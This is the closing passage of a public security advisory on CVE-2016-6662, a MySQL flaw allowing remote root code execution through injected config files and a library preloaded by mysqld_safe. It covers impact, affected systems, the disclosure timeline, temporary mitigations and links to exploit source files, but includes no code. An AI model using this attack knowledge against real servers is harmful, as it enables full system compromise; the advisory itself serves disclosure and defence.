removes the need for the attackers to have direct mysql connection and increases  
the risk of exploitation.  
  
Successful exploitation could gain a attacker a remote shell with root privileges  
which would allow them to fully compromise the remote system.  
  
If exploited, the malicious code would run as soon as MySQL daemon gets  
restarted. MySQL service restart could happen for a number of reasons.  
  
  
VIII. SYSTEMS AFFECTED  
-------------------------  
  
All MySQL versions from the oldest versions to the latest shown at the beginnig  
of this advisory.  
  
Some systems run MySQL via Systemd and provide direct startup path to mysqld   
daemon instead of using mysqld_safe wrapper script. These systems however are  
also at risk as mysqld_safe may be called on update by the installation scripts  
or some other system services.  
  
Because the exploit only accesses files normally used by MySQL server (  
such as the config), and the injected library is preloaded by mysqld_safe startup   
scripta not included within the default policies, the vulnerability can be   
exploited even if security modules as SELinux and AppArmor are installed with   
active security policies for the MySQL daemon.  
  
  
IX. VENDOR RESPONSE / SOLUTION  
-------------------------  
  
The vulnerability was reported to Oracle on 29th of July 2016 and triaged  
by the security team.  
It was also reported to the other affected vendors including PerconaDB and MariaDB.  
  
The vulnerabilities were patched by PerconaDB and MariaDB vendors by the end of  
30th of August.  
During the course of the patching by these vendors the patches went into  
public repositories and the fixed security issues were also mentioned in the  
new releases which could be noticed by malicious attackers.  
  
As over 40 days have passed since reporting the issues and patches were already  
mentioned publicly, a decision was made to start disclosing vulnerabilities  
(with limited PoC) to inform users about the risks before the vendor's next   
CPU update that only happens at the end of October.  
  
No official patches or mitigations are available at this time from the vendor.   
As temporary mitigations, users should ensure that no mysql config files are  
owned by mysql user, and create root-owned dummy my.cnf files that are not in   
use.  
These are by no means a complete solution and users should apply official vendor  
patches as soon as they become available.  
  
  
X. REFERENCES  
-------------------------  
  
http://legalhackers.com  
  
http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html  
  
Source codes from the advisory:  
http://legalhackers.com/exploits/0ldSQL_MySQL_RCE_exploit.py  
  
http://legalhackers.com/exploits/mysql_hookandroot_lib.c  
  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6662  
  
The old vulnerability fixed in MySQL version 3.23.55:  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0150  
  
  
XI. CREDITS  
-------------------------  
  
The vulnerability has been discovered by Dawid Golunski  
dawid (at) legalhackers (dot) com  
http://legalhackers.com  
  
XII. REVISION HISTORY  
-------------------------  
  
12.09.2016 - Advisory released publicly as 0day  
  
XIII. LEGAL NOTICES  
-------------------------  
  
The information contained within this advisory is supplied "as-is" with  
no warranties or guarantees of fitness of use or otherwise. I accept no  
responsibility for any damage caused by the use or misuse of this information.  
  
`